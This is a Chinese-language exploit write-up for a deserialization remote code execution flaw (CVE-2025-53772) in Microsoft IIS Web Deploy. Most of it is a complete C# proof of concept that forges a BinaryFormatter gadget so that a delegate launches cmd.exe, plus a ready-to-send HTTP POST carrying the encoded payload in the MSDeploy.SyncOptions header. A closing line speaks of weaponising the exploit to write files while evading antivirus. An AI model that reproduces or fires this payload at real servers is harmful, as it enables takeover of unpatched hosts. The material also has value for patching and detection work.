CVE-2025-53772 IIS WebDeploy RCE
CVE-2025-53772 IIS WebDeploy RCE
Microsoft Web Deploy 的 msdeployagentservice 和 msdeploy.axd 端点在处理 HTTP 标头内容时存在反序列化漏洞。按下文 PoC,载荷放在 MSDeploy.SyncOptions 标头中,是 BinaryFormatter 序列化数据经 GZip 压缩后再做 Base64 编码的结果。
致谢
漏洞评分
CVE-2025-53772 / 8.8
IIS WebDeploy
PoC
using System; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.IO.Compression; using System.Reflection; using System.Runtime.Serialization.Formatters.Binary;

namespace ConsoleApp1ee
{
    class Program
    {
        /// <summary>
        /// Builds a <see cref="SortedSet{T}"/> of two strings whose comparer wraps a
        /// tampered multicast delegate, serializes it with <see cref="BinaryFormatter"/>,
        /// GZip-compresses the bytes and prints them as Base64 on standard output.
        /// </summary>
        /// <param name="args">Command-line arguments; not read by this method.</param>
        /// <remarks>
        /// NOTE(review): statement order matters here. Both elements are added while the
        /// delegate still holds two String.Compare entries, and only afterwards is the
        /// second entry replaced. Presumably this keeps the comparison harmless on the
        /// machine that generates the blob; do not reorder.
        /// NOTE(review): the receiving side is not shown in this listing. The general
        /// defensive point is that BinaryFormatter must never deserialize data from an
        /// untrusted source. A service that does so should be patched or taken off the
        /// network, and its host process monitored for unexpected child processes
        /// (for example cmd.exe) -- confirm the exact process names for your deployment.
        /// </remarks>
        static void Main(string[] args)
        {
            // A Comparison<string> combined with itself: a multicast delegate with two entries.
            Delegate da = new Comparison<string>(String.Compare);
            Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);

            // The set orders its elements through this comparer, i.e. through delegate d.
            IComparer<string> comp = Comparer<string>.Create(d);
            SortedSet<string> set = new SortedSet<string>(comp);

            // The two strings stored in the set. "/c calc" is the usual harmless
            // demonstration command (it opens the calculator).
            set.Add("cmd.exe");
            set.Add("/c calc");

            // Entry [1] of the invocation list is overwritten with a delegate to
            // Process.Start(string, string). Its type does not match Comparison<string>,
            // which is why the private field "_invocationList" is written via reflection.
            FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
            object[] invoke_list = d.GetInvocationList();
            invoke_list[1] = new Func<string, string, Process>(Process.Start);
            fi.SetValue(d, invoke_list);

            using (MemoryStream stream = new MemoryStream())
            {
                // Serialize the whole set, comparer and tampered delegate included.
                BinaryFormatter formatter = new BinaryFormatter();
                formatter.Serialize(stream, set);

                using (MemoryStream compst = new MemoryStream())
                {
                    using (GZipStream gzipStream = new GZipStream(compst, CompressionMode.Compress))
                    {
                        // Rewind before copying, otherwise nothing would be read from the stream.
                        stream.Position = 0;
                        stream.CopyTo(gzipStream);
                    }

                    // compst is read only after gzipStream is disposed, so the GZip data is complete.
                    string gzb4 = Convert.ToBase64String(compst.ToArray());
                    Console.WriteLine(gzb4);
                }
            }
        }
    }
}
// The text below is not C#. It is the start of the HTTP request from the write-up,
// fused onto this line by extraction. The MSDeploy.SyncOptions value continues on the next line.
POST /msdeployagentservice HTTP/1.1 Host: 192.168.116.129 MSDeploy.RequestId: 1 Content-Type: application/msdeploy MSDeploy.Method: Sync MSDeploy.SyncOptions: 
H4sIAAAAAAAEAM1VXW/TMBRNmtZNsnUMBAjGS8QTaFXWdhtjD0WaOj6qCTSRiZeq2lL3rkQk9rAdifLMK/+Ffwi+rTMYYoyKFuEo15/3+Pj45sayLcv6qgvWWJZL2nSjsVSQ1YM3IGTCWXsrbOBTDzp5qnIBbQa5EnFaDw7zQZrQAxgf8XfA2oOdnXibbj9q7m5uQePxbgVxP9lTvLDD0xSo0ogyfA4MRELDiAsFwwjUSbPXM+siJRI2qgeZpFykyWAORPr9smZS6fCcKbfDs7NYgKga2EpX7yotxyLu599xnfolkrMCYdGkXbwOfD2naOA5ytj7z6jiTS8d0/N9nftmt31IYRQriDSxOE0+xsj0BU+HILyKdrpeNkcjRJvqBg1onFJSxQ7NhiF8gDKu+wM8lMUt5qsZqLd82DB103GcxtUQ68XcU6bEeMM4vIZTI3H4ErIBiC475b/wnnW95+KVemh8vFfszkwSlSqr8Rm4sZR6t3RMVCxGoG5MqyM9tWdmVr4PvYoz8KfaYLM2/BHTtku2bc8uGFnSZL6UjNuznNGTzYXGXf2fgO8n8YhxqRIqw0PBKUhZD+aWJft9sqxlO5gjdZ/U5prIyYqGW7tcDXIN02uko0t5qxiPGNOzfg2TQMZYXC7CFTteJ9VxPWlFyYjFyNs/b7X8KSRG9KrJfntilGfAlLSxWI5bM0RwUa/vIVcP9fHwVOSmNk8uP1owOdWDn8LsQvchufX3GPjt+zamAdSO3Mb8Z5K3h+FB7mhTu+BD7uqh9S5Tm63ALL2C55p2aJmxGfym3PBisUXuafP+/O9TZPxF/2EmKvgT66EWHkrkL30Dt7++5cQIAAA= Content-Length: 0
exploit
考虑opsec,杀软情况,进行武器化写入文件.
POST /msdeployagentservice HTTP/1.1 Host: 192.168.116.129 MSDeploy.RequestId: 1 Content-Type: application/msdeploy MSDeploy.Method: Sync MSDeploy.SyncOptions: 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 Content-Length: 17